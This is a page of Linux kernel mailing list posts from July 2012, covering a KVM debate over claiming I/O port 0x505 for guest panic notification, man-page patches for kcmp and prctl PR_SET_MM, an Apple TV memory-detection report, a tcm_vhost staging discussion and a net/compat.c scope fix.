>>> Why can't we re-use everything we have now, push a virtio watchdog
>>> driver into drivers/watchdog/, and gain a more complete solution to
>>> detecting hangs inside the guest.
>> 
>> The purpose of virtio is not to reinvent every possible type of device.
>> There are plenty of hardware watchdogs that are very suitable to be used
>> for this purpose.  QEMU implements quite a few already.
>> 
>> Watchdogs are not performance sensitive so there's no point in using
>> virtio.
>
> The issue here is not performance, but the adding of a brand new
> guest-host interface.

We have:

1) Virtio--this is our preferred PV interface.  It needs PCI to be fully
initialized and probably will live as a module.

2) Hypercalls--this a secondary PV interface but is available very
early.  It's terminated in kvm.ko which means it can only operate on
things that are logically part of the CPU and/or APIC complex.

This patch introduces a third interface which is available early like
hypercalls but not necessarily terminated in kvm.ko.  That means it can
have a broader scope in functionality than (2).

We could just as well use a hypercall and have multiple commands issued
to that hypercall as a convention and add a new exit type to KVM that
sent that specific hypercall to userspace for processing.

But a PIO operation already has this behavior and requires no changes to kvm.ko.

> virtio-rng isn't performance sensitive either, yet it was implemented
> using virtio so there wouldn't be yet another interface to communicate
> between guest and host.

There isn't really an obvious discrete RNG that is widely supported.

> This patch goes ahead to add a "arch pv features" interface using
> ioports, without any idea what it might be used for beyond this
> watchdog.

It's not a watchdog--it's the opposite of a watchdog.

You know such a thing already exists in the kernel, right?  S390 has had
a hypercall like this for years.

Regards,

Anthony Liguori
--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


Re: [Qemu-devel] [PATCH v7] kvm: notify host when the guest is panicked

2012-07-22 Thread Anthony Liguori
Sasha Levin  writes:

> On 07/22/2012 10:19 PM, Sasha Levin wrote:
>> On 07/22/2012 09:22 PM, Anthony Liguori wrote:
>>> Sasha Levin  writes:
>>>
 On 07/21/2012 09:12 AM, Wen Congyang wrote:
> +#define KVM_PV_PORT  (0x505UL)
> +
>  #ifdef __KERNEL__
>  #include 
>  
> @@ -221,6 +223,11 @@ static inline void kvm_disable_steal_time(void)
>  }
>  #endif
>  
> +static inline unsigned int kvm_arch_pv_features(void)
> +{
> + return inl(KVM_PV_PORT);
> +}
> +

 Why is this safe?

 I'm not sure you can just pick any ioport you'd like and use it.
>>>
>>> There are three ways I/O ports get used on a PC:
>>>
>>> 1) Platform devices
>>>  - This is well defined since the vast majority of platform devices are
>>>implemented within a single chip.  If you're emulating an i440fx
>>>chipset, the PIIX4 spec has an exhaustive list.
>>>
>>> 2) PCI devices
>>>  - Typically, PCI only allocates ports starting at 0x0d00 to avoid
>>>conflicts with ISA devices.
>>>
>>> 3) ISA devices
>>>  - ISA uses subtractive decoding so any ISA device can access.  In
>>>theory, an ISA device could attempt to use port 0x0505 but it's
>>>unlikely.  In a modern guest, there aren't really any ISA devices being
>>>added either.
>>>
>>> So yes, picking port 0x0505 is safe for something like this (as long as
>>> you check to make sure that you really are under KVM).
>> 
>> Is there anything that actually prevents me from using PCI ports lower than 
>> 0x0d00? As you said in (3), ISA isn't really used anymore (nor is 
>> implemented by lkvm for example), so placing PCI below 0x0d00 might even 
>> make sense in that case.
>> 
>> Furthermore, I can place one of these brand new virtio-mmio devices which 
>> got introduced recently wherever I want right now - Having a device that 
>> uses 0x505 would cause a pretty non-obvious failure mode.
>> 
>> Either way, If we are going to grab an ioport, then:
>> 
>>  - It should be documented well somewhere in Documentation/virt/kvm
>>  - It should go through request_region() to actually claim those ioports.
>>  - It should fail gracefully if that port is taken for some reason, instead 
>> of not even checking it.
>> 
>
> Out of curiosity I tested that, and apparently lkvm has no problem allocating 
> virtio-pci devices in that range:
>
> sh-4.2# pwd
> /sys/devices/pci:00/:00:01.0
> sh-4.2# cat resource | head -n1
> 0x0500 0x05ff 0x00040101
>
> This was with the commit in question applied.

With all due respect, lkvm has a half-baked implementation of PCI.  This
is why you have to pass kernel parameters to disable ACPI and disable
PCI BIOS probing.

So yeah, you can do funky things in lkvm but that doesn't mean a system
that emulated actual hardware would ever do that.

Regards,

Anthony Liguori
--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


Re: [Qemu-devel] [PATCH v7] kvm: notify host when the guest is panicked

2012-07-22 Thread Anthony Liguori
Sasha Levin  writes:

> On 07/22/2012 09:22 PM, Anthony Liguori wrote:
>> Sasha Levin  writes:
>> 
>>> On 07/21/2012 09:12 AM, Wen Congyang wrote:
 +#define KVM_PV_PORT   (0x505UL)
 +
  #ifdef __KERNEL__
  #include 
  
 @@ -221,6 +223,11 @@ static inline void kvm_disable_steal_time(void)
  }
  #endif
  
 +static inline unsigned int kvm_arch_pv_features(void)
 +{
 +  return inl(KVM_PV_PORT);
 +}
 +
>>>
>>> Why is this safe?
>>>
>>> I'm not sure you can just pick any ioport you'd like and use it.
>> 
>> There are three ways I/O ports get used on a PC:
>> 
>> 1) Platform devices
>>  - This is well defined since the vast majority of platform devices are
>>implemented within a single chip.  If you're emulating an i440fx
>>chipset, the PIIX4 spec has an exhaustive list.
>> 
>> 2) PCI devices
>>  - Typically, PCI only allocates ports starting at 0x0d00 to avoid
>>conflicts with ISA devices.
>> 
>> 3) ISA devices
>>  - ISA uses subtractive decoding so any ISA device can access.  In
>>theory, an ISA device could attempt to use port 0x0505 but it's
>>unlikely.  In a modern guest, there aren't really any ISA devices being
>>added either.
>> 
>> So yes, picking port 0x0505 is safe for something like this (as long as
>> you check to make sure that you really are under KVM).
>
> Is there anything that actually prevents me from using PCI ports lower
> than 0x0d00? As you said in (3), ISA isn't really used anymore (nor is
> implemented by lkvm for example), so placing PCI below 0x0d00 might
> even make sense in that case.

On modern systems, the OS goes by whatever is in the ACPI table
describing the PCI bus.  In QEMU, we have:

WordIO (ResourceProducer, MinFixed, MaxFixed, PosDecode, EntireRange,
  0x, // Address Space Granularity
  0x0D00, // Address Range Minimum
  0x, // Address Range Maximum
  0x, // Address Translation Offset
  0xF300, // Address Length
  ,, , TypeStatic)

So Linux will always use 0x0D00 -> 0x for the valid
range. Practically speaking, you can't use anything below 0x0D00 because
the PCI bus configuration registers live at 0xCF8-0xCFF.  If you tried
to create the region starting at 0x0500 you'd have to limit it to 0xCF8
to avoid conflicting with the PCI host controller.

That's not a useful amount of space for I/O ports so that would be a
pretty dumb thing to do.

> Furthermore, I can place one of these brand new virtio-mmio devices
> which got introduced recently wherever I want right now - Having a
> device that uses 0x505 would cause a pretty non-obvious failure mode.

I think you're confusing PIO with MMIO.  They are separate address
spaces.

You could certainly argue that relying on PIO is way too architecture
specific since that's only available on x86.  That's a good argument but
the counter is that other architectures have their own interfaces for
this sort of thing.

> Either way, If we are going to grab an ioport, then:
>
>  - It should be documented well somewhere in Documentation/virt/kvm
>  - It should go through request_region() to actually claim those ioports.
>  - It should fail gracefully if that port is taken for some reason,
>  instead of not even checking it.

I agree with the above.

Regards,

Anthony Liguori
--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


[PATCH 1/2] Add kcmp.2 manpage

2012-07-22 Thread Cyrill Gorcunov
NAME
   kcmp - compare if two processes do share a particular kernel resource

SYNOPSIS
   #define _GNU_SOURCE /* See feature_test_macros(7) */
   #include 
   #include 
   #include/* For SYS_xxx definitions */

   int syscall(__NR_kcmp, pid1, pid2, type, idx1, idx2);

DESCRIPTION
   kcmp() allows to find out if two processes identified by pid1 and pid2
   share kernel resources such as virtual memory, file descriptors, file 
system etc.

   The comparison type is one of the following

   KCMP_FILE determines whether a file descriptor idx1 in the first process
   is the same as another descriptor idx2 in the second process

   KCMP_VM compares whether processes share address space

   KCMP_FILES compares the file descriptor arrays to see whether the 
processes
   share all files

   KCMP_FS compares whether processes share the file system information 
(the current
   umask, working directory, namespace root, etc)

   KCMP_SIGHAND compares whether processes share a signal handlers table

   KCMP_IO compares whether processes do share I/O context, used mainly for
   block I/O scheduling

   KCMP_SYSVSEM compares the list of undo operations associated with SYSV 
semaphores

   Note  the  kcmp() is not protected against false positives which may have
   place if tasks are running.  Which means one should stop tasks being 
inspected
   with this syscall to obtain meaningful results.

RETURN VALUE
   kcmp was designed to return values suitable for sorting.  This is 
particularly handy
   when one have to compare a large number of file descriptors.

   The return value is merely a result of simple arithmetic comparison of 
kernel pointers
   (when kernel compares resources, it uses their memory addresses).

   The  easiest way to explain is to consider an example.  Lets say v1 and 
v2 are the
   addresses of appropriate resources, then the return value is one of the 
following

   0 - v1 is equal to v2 , in other words we have a shared resource here
   1 - v1 is less than v2
   2 - v1 is greater than v2
   3 - v1 is not equal to but ordering information is unavailble.

   On error, -1 is returned, and errno is set appropriately.

Signed-off-by: Cyrill Gorcunov 
CC: "Eric W. Biederman" 
CC: "H. Peter Anvin" 
CC: Pavel Emelyanov 
CC: Al Viro 
Signed-off-by: Cyrill Gorcunov 
---
 man2/kcmp.2 |  113 +++
 1 files changed, 113 insertions(+), 0 deletions(-)
 create mode 100644 man2/kcmp.2

diff --git a/man2/kcmp.2 b/man2/kcmp.2
new file mode 100644
index 000..5d2e9a3
--- /dev/null
+++ b/man2/kcmp.2
@@ -0,0 +1,113 @@
+.TH KCMP 2 2012-02-01 "Linux" "Linux Programmer's Manual"
+
+.SH NAME
+kcmp \- compare if two processes do share a particular kernel resource
+
+.SH SYNOPSIS
+.nf
+.BR "#define _GNU_SOURCE" " /* See feature_test_macros(7) */"
+.B #include 
+.B #include 
+.BR "#include"  "/* For SYS_xxx definitions */"
+
+.BI "int syscall(__NR_kcmp, pid1, pid2, type, idx1, idx2);"
+.fi
+
+.SH DESCRIPTION
+
+.BR kcmp ()
+allows to find out if two processes identified by
+.I pid1
+and
+.I pid2
+share kernel resources such as virtual memory, file descriptors, file system 
etc.
+
+The comparison
+.I type
+is one of the following
+
+.BR KCMP_FILE
+determines whether a file descriptor
+.I idx1
+in the first process is the same as another descriptor
+.I idx2
+in the second process
+
+.BR KCMP_VM
+compares whether processes share address space
+
+.BR KCMP_FILES
+compares the file descriptor arrays to see whether the processes share all 
files
+
+.BR KCMP_FS
+compares whether processes share the file system information (the current 
umask,
+working directory, namespace root, etc)
+
+.BR KCMP_SIGHAND
+compares whether processes share a signal handlers table
+
+.BR KCMP_IO
+compares whether processes do share I/O context,
+used mainly for block I/O scheduling
+
+.BR KCMP_SYSVSEM
+compares the list of undo operations associated with SYSV semaphores
+
+Note the
+.BR kcmp ()
+is not protected against false positives which may have place if tasks are
+running.
+Which means one should stop tasks being inspected with this syscall to obtain
+meaningful results.
+
+.SH "RETURN VALUE"
+.B kcmp
+was designed to return values suitable for sorting.
+This is particularly handy when one have to compare
+a large number of file descriptors.
+
+The return value is merely a result of simple arithmetic comparison
+of kernel pointers (when kernel compares resources, it uses their
+memory addresses).
+
+The easiest way to explain is to consider an example.
+Lets say
+.I v1
+and
+.I v2
+are the addresses of appropriate resources, then the return value
+is one of the following
+
+.B 0
+\-
+.I v1
+is equal to
+.IR v2 ,
+in other words we have a shared resource here
+
+.B 1
+\-
+.I v1
+is less than
+.I v2
+
+.B 2
+\-
+.I v1
+is greater than
+.I

[PATCH 2/2] prctl.2: Add PR_SET_MM option description

2012-07-22 Thread Cyrill Gorcunov
CC: Pavel Emelyanov 
Signed-off-by: Cyrill Gorcunov 
---
 man2/prctl.2 |  161 +-
 1 files changed, 160 insertions(+), 1 deletions(-)

diff --git a/man2/prctl.2 b/man2/prctl.2
index effad2a..2e1b27c 100644
--- a/man2/prctl.2
+++ b/man2/prctl.2
@@ -378,6 +378,121 @@ Return the current per-process machine check kill policy.
 All unused
 .BR prctl ()
 arguments must be zero.
+.TP
+.BR PR_SET_MM " (since Linux 3.3)"
+Allows a user to modify certain kernel memory map descriptor fields
+of the calling process.
+Usually these fields are set by the kernel and dynamic loader (see
+.BR ld.so (8)
+for more information) and a regular application should not use this feature.
+Still there are cases such as self-modifying programs, where a program might
+find it useful to change its own memory map.
+The kernel must be built with
+.BR CONFIG_CHECKPOINT_RESTORE
+option turned on, otherwise this feature will not be accessible
+from a user space level.
+The calling process must have
+.BR CAP_SYS_RESOURCE
+(see
+.BR capabilities (7)
+for details) capability granted.
+The value in
+.I arg2
+is one of the options below, while
+.I arg3
+provides a new value for this option.
+
+.BR PR_SET_MM_START_CODE
+to set the address above which program text can run.
+
+.BR PR_SET_MM_END_CODE
+to set the address below which program text can run.
+
+.BR PR_SET_MM_START_DATA
+to set the address above which program data+bss is placed.
+
+.B PR_SET_MM_END_DATA
+to set the address below which program data+bss is placed.
+
+.BR PR_SET_MM_START_STACK
+to set the start address of the stack.
+
+.BR PR_SET_MM_START_BRK
+to set the address above which program heap can be expanded with
+.BR brk (2)
+call.
+The address must not be greater than ending address of
+the current program data segment, neither it may exceed
+resource limit for data (see
+.BR setrlimit (2)
+for more information).
+
+.BR PR_SET_MM_BRK
+to set the current
+.BR brk (2)
+value.
+The requirements for address are the same as for
+.BR PR_SET_MM_START_BRK
+option.
+
+.BR PR_SET_MM_ARG_START
+to set the address above which program command line is placed.
+
+.BR PR_SET_MM_ARG_END
+to set the address below which program command line is placed.
+
+.BR PR_SET_MM_ENV_START
+to set the address above which program environment is placed.
+
+.BR PR_SET_MM_ENV_END
+to set the address below which program environment is placed.
+
+The address passed with
+.BR PR_SET_MM_ARG_START ,
+.BR PR_SET_MM_ARG_END ,
+.BR PR_SET_MM_ENV_START ,
+.BR PR_SET_MM_ENV_END ,
+should belong to a process stack area, thus corresponding memory area
+must be readable, writable and (depending on the kernel
+configuration) has
+.BR MAP_GROWSDOWN
+attribute set (see
+.BR mmap (2)
+for details).
+
+.BR PR_SET_MM_AUXV
+to set a new auxiliary vector.
+The
+.I arg3
+argument should provide the address of the vector.
+The
+.I arg4
+is the size of the vector.
+
+.BR PR_SET_MM_EXE_FILE
+to supersede
+.IR /proc/pid/exe
+symbolic link with a new one pointing to a new executable file
+which descriptor is provided provided in the
+.I arg3
+argument.
+The file descriptor should be obtaned with a regular
+.BR open (2)
+call.
+
+To change the symlink, one needs to unmap all existing
+executable memory areas being created by the kernel itself
+(for example the kernel usually creates at least one executable
+memory area for Elf file
+.IR \.text
+section).
+
+The second limitation is that such transition can be done once
+in a process life time.
+Any furter attempts will be rejected.
+This should help system administrators to monitor the unusual
+symlinks transitions over all process running in a system.
+.\"
 .SH "RETURN VALUE"
 On success,
 .BR PR_GET_DUMPABLE ,
@@ -411,7 +526,9 @@ is not recognized.
 is
 .BR PR_MCE_KILL
 or
-.BR PR_MCE_KILL_GET ,
+.BR PR_MCE_KILL_GET
+or
+.BR PR_SET_MM ,
 and unused
 .BR prctl ()
 arguments were not specified as zero.
@@ -459,6 +576,48 @@ is
 and the caller does not have the
 .B CAP_SETPCAP
 capability.
+.TP
+.B EPERM
+.I option
+is
+.BR PR_SET_MM ,
+and the caller does not have the
+.B CAP_SYS_RESOURCE
+capability.
+.TP
+.B EACCES
+.I option
+is
+.BR PR_SET_MM ,
+and the
+.I arg3
+is
+.BR PR_SET_MM_EXE_FILE ,
+the file is not executable one.
+.TP
+.B EBUSY
+.I option
+is
+.BR PR_SET_MM ,
+and the
+.I arg3
+is
+.BR PR_SET_MM_EXE_FILE ,
+the second attempt to change
+.I /proc/pid/exe
+symlink is prohibited.
+.TP
+.B EBADF
+.I option
+is
+.BR PR_SET_MM ,
+and the
+.I arg3
+is
+.BR PR_SET_MM_EXE_FILE ,
+the file descriptor passed in
+.I arg4
+is not found.
 .\" The following can't actually happen, because prctl() in
 .\" seccomp mode will cause SIGKILL.
 .\" .TP
-- 
1.7.7.6

--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


[PATCH 0/2] kcmp.2 manpage and prctl.2 update

2012-07-22 Thread Cyrill Gorcunov
Hi Michael,

here are two patches on top of current man-pages git.
Please review. If there something I should rephrase
or anything -- please don't hesitate to poke me.

--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


Re: Kernel not detecting all of physical RAM in 1st generation Apple TV

2012-07-22 Thread Damián Gatabria
I've hit the same problem; 3.4.4 still only uses 64MB of memory, even
though it detects all 256MB of it. Could anybody please at least
review the kernel config provided by Bharath and let us know if
there's anything obviously wrong with it or if this is expected
behavior for some reason?


Thank you.



On Mon, Jun 25, 2012 at 10:52 PM, Bharath Ramesh  wrote:
>
> I am trying to get a minimal kernel config running on a 1st generation
> Apple TV to compile the kernel so that I can have it detect all of the
> 256MB of RAM the device has. A brief summary to get Linux booting on
> the 1st generation Apple TV requires the use of the atv-bootloader
> project [1]. The 1st generation Apple TV uses EFI and the
> atv-bootloader project translates EFI structures to standard PC BIOS
> structures. The issue I am facing is that kernel doesnt always detect
> the entire 256MB of RAM that the Apple TV has. With a very minimal
> change in the kernel config I can cause the kernel not to detect the
> entire 256MB of RAM. I have test config along with the respective
> dmesg output which shows this issue. This was not the case with the
> earlier 2.6.24 kernel that I am running, the 2.6.24 kernel is a Ubuntu
> 8.04 distribution kernel. The following config and dmesg is using
> kernel.org source.
>
> config-3.2.18-nouveau-256M: http://pastebin.com/9V8dSED3
> config-3.2.18-nouveau-64M: http://pastebin.com/CsUK0yy3
> config.3.2.18-nouveau-256M-64M.diff: http://pastebin.com/MkYbQf5V
> dmesg.3.2.18-nouveau-256M: http://pastebin.com/UUYBzqm8
> dmesg.3.2.18-nouveau-64M: http://pastebin.com/FDntUsfd
> dmesg.3.2.18-nouveau-256M-64M.diff: http://pastebin.com/2myAa9Z0
>
> Any help in debugging this issue that I can get the kernel to always
> detect all of the RAM would be greatly appreciated. I am not
> subscribed to the list, would greatly appreciate it if I am copied in
> the response.
>
> Thanks,
>
> Bharath
>
> [1] http://code.google.com/p/atv-bootloader/
> --
> To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
> the body of a message to majord...@vger.kernel.org
> More majordomo info at  http://vger.kernel.org/majordomo-info.html
> Please read the FAQ at  http://www.tux.org/lkml/
--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


Re: [PATCH] net: Fix references to out-of-scope variables in put_cmsg_compat()

2012-07-22 Thread David Miller
From: Jesper Juhl 
Date: Sun, 22 Jul 2012 23:37:20 +0200 (CEST)

> In net/compat.c::put_cmsg_compat() we may assign 'data' the address of
> either the 'ctv' or 'cts' local variables inside the 'if
> (!COMPAT_USE_64BIT_TIME)' branch.
> 
> Those variables go out of scope at the end of the 'if' statement, so
> when we use 'data' further down in 'copy_to_user(CMSG_COMPAT_DATA(cm),
> data, cmlen - sizeof(struct compat_cmsghdr))' there's no telling what
> it may be refering to - not good.
> 
> Fix the problem by simply giving 'ctv' and 'cts' function scope.
> 
> Signed-off-by: Jesper Juhl 

Applied and queued up for -stable, thanks.
--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


Re: linux-next: manual merge of the staging tree with the target-merge tree

2012-07-22 Thread Nicholas A. Bellinger
On Sat, 2012-07-21 at 19:07 -0700, Greg KH wrote:
> On Fri, Jul 20, 2012 at 09:42:28PM +0300, Michael S. Tsirkin wrote:



> > It's very similar to how it was with nouveau: we are not sure
> > we can commit to the userspace ABI yet.
> 
> Then you are in trouble :)
> 

I agree with MST here that tcm_vhost needs a clear way to indicate that
ABI changes are likely to occur in transmit from staging -> post-staging
status.  

> > Most importantly, it still seems not 100% clear whether this driver will
> > have major userspace using it. And if not, it would be very hard to
> > support a driver when recent userspace does not use it in the end.
> > 
> > At the moment arguments on upstream mailing list seem to be
> > a bit circular: there's no module in upstream kernel so
> > userspace does not want to accept the patches.
> > 
> > If we put enabling this driver in staging, then it works out in one of
> > two ways
> > - userspace starts using it then this effectively freezes the ABI and
> >   we move it out of staging next release
> > - no userspace uses it and we drop it completely or rework ABI
> > 
> > On the other hand, it is marginally better to not want code in staging
> > for two reasons:
> > - there are dependencies between this code and other code in
> >   drivers/vhost which are easier for me to handle if it's all
> >   in one place
> 
> If there are going to be lots of dependancies, then I don't want it in
> drivers/staging/ as it doesn't belong there, it belongs cleaned up and
> in the "real" place.
> 
> > - a bit easier to track history if we do not move code
> 
> git preserves this, don't worry about that at all.
> 
> So, if this code really does depend on core vhost changes that are going
> to be happening over time, I would not recommend it being in
> drivers/staging/ as you are right, you are going to have a hard time
> syncing with me.
> 

So Linus has merged target-pending/for-next this afternoon, so now we
are just waiting on net-next to hit mainline with the vhost patches
already ACK'ed by MST.  Hopefully that makes things easier for you to
considering taking tcm_vhost upstream via staging.  ;)

Also, MST asked for an RFC-v5 for the initial merge commit with some
minor debug wrapper changes that will be going out next week.  This will
include a move into drivers/staging/tcm_vhost/ against a rebased
staging.git patch with the necessary -rc0 mainline dependencies.

Please let me know if your OK with this, otherwise I'll just plan to
keep -v5 against target-pending/for-next-merge for now, and send a GIT
PULL after MST gets back from holiday on the 29th -> 30th.

> But don't think that by somehow marking the driver with CONFIG_STAGING
> that you get a free pass on the "we are going to break the userspace
> api", that's not ok.  Be careful about this.  Yes, it's tough, and it's
> a "chicken and egg" problem like you mention above, I know.
> 

After sleeping on this, I'm wondering if there is not something else we
could do at the QEMU level to require an explicit 'development=1' flag
in order to use vhost-scsi while tcm_vhost is still marked as staging
code..?

QEMU folks, would you be open to something like this..?

Thank you,

--nab

--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


[PATCH] net: Fix references to out-of-scope variables in put_cmsg_compat()

2012-07-22 Thread Jesper Juhl
In net/compat.c::put_cmsg_compat() we may assign 'data' the address of
either the 'ctv' or 'cts' local variables inside the 'if
(!COMPAT_USE_64BIT_TIME)' branch.

Those variables go out of scope at the end of the 'if' statement, so
when we use 'data' further down in 'copy_to_user(CMSG_COMPAT_DATA(cm),
data, cmlen - sizeof(struct compat_cmsghdr))' there's no telling what
it may be refering to - not good.

Fix the problem by simply giving 'ctv' and 'cts' function scope.

Signed-off-by: Jesper Juhl 
---
 net/compat.c | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/net/compat.c b/net/compat.c
index 1b96281..74ed1d7 100644
--- a/net/compat.c
+++ b/net/compat.c
@@ -221,6 +221,8 @@ int put_cmsg_compat(struct msghdr *kmsg, int level, int 
type, int len, void *dat
 {
struct compat_cmsghdr __user *cm = (struct compat_cmsghdr __user *) 
kmsg->msg_control;
struct compat_cmsghdr cmhdr;
+   struct compat_timeval ctv;
+   struct compat_timespec cts[3];
int cmlen;
 
if (cm == NULL || kmsg->msg_controllen < sizeof(*cm)) {
@@ -229,8 +231,6 @@ int put_cmsg_compat(struct msghdr *kmsg, int level, int 
type, int len, void *dat
}
 
if (!COMPAT_USE_64BIT_TIME) {
-   struct compat_timeval ctv;
-   struct compat_timespec cts[3];
if (level == SOL_SOCKET && type == SCM_TIMESTAMP) {
struct timeval *tv = (struct timeval *)data;
ctv.tv_sec = tv->tv_sec;
-- 
1.7.11.2


-- 
Jesper Juhlhttp://www.chaosbits.net/
Don't top-post http://www.catb.org/jargon/html/T/top-post.html
Plain text mails only, please.

--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


<    1   2   3   4   >